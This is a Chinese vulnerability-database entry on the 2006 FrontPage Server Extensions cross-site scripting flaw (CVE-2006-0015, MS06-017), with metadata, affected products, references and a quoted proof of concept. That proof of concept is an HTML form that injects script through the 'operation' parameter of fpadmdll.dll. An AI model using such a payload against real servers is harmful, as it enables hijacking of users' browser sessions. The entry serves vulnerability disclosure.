Microsoft FrontPage Server Extensions跨站脚本漏洞(MS06-017)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110047 漏洞类型 跨站脚本
发布时间 2006-04-11 更新时间 2006-04-13
CVE编号 CVE-2006-0015 CNNVD-ID CNNVD-200604-154
漏洞平台 CGI CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/27620
https://www.securityfocus.com/bid/17452
https://cxsecurity.com/issue/WLB-2006040037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-154
|漏洞详情
FrontPageServerExtensions为FrontPage服务扩展,与IIS一起使用可以方便的支持管理、创建以及浏览FrontPage扩展的网站。FrontPageServerExtensions对HTML页面的处理存在输入验证漏洞,远程攻击者可能在客户机器上执行任意脚本代码。FrontPageServerExtensions的fpadmdll.dll中的一些参数没有正确的过滤返回给用户的特定输入,导致跨站脚本问题,可能允许攻击者以当前会话权限以客户机的浏览器中执行恶意脚本代码,利用这个漏洞必须用户交互。fpadmdll.dll中有漏洞的参数是operation、command和name。这些参数没有经过正确的过滤便出现在了输出中,但可通过"-->"转义。
|漏洞EXP
source: http://www.securityfocus.com/bid/17452/info

Microsoft FrontPage Server Extensions are prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before it is rendered to other users. 

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user, with the privileges of the victim userâ??s account. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

<form action=http://www.example.com/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>
|受影响的产品
Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Professional SP2 Microsoft Windows XP Professional Microsoft Windows XP Home SP2 Microsoft Windows Server 2003 Standar
|参考资料

来源:BID
名称:17452
链接:http://www.securityfocus.com/bid/17452
来源:MS
名称:MS06-017
链接:http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx
来源:VUPEN
名称:ADV-2006-1322
链接:http://www.frsirt.com/english/advisories/2006/1322
来源:MISC
链接:http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
来源:SECTRACK
名称:1015896
链接:http://securitytracker.com/id?1015896
来源:SECTRACK
名称:1015895
链接:http://securitytracker.com/id?1015895
来源:SECUNIA
名称:19623
链接:http://secunia.com/advisories/19623
来源:BUGTRAQ
名称:20060412VulnerabilityinMicrosoftFrontPageServerExtensionsCouldAllowCross-SiteScripting
链接:http://www.securityfocus.com/archive/1/archive/1/430803/100/0/threaded
来源:XF
名称:fpse-html-xss(25537)
链接:http://xforce.iss.net/xforce/xfdb/25537
来源:SREASON
名称:704
链接:http://securityreason.com/securityalert/704
来源:USGovernmentResource:oval:org.mitre.oval:def:1748
名称:oval:org.mitre.oval:def:1748
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1748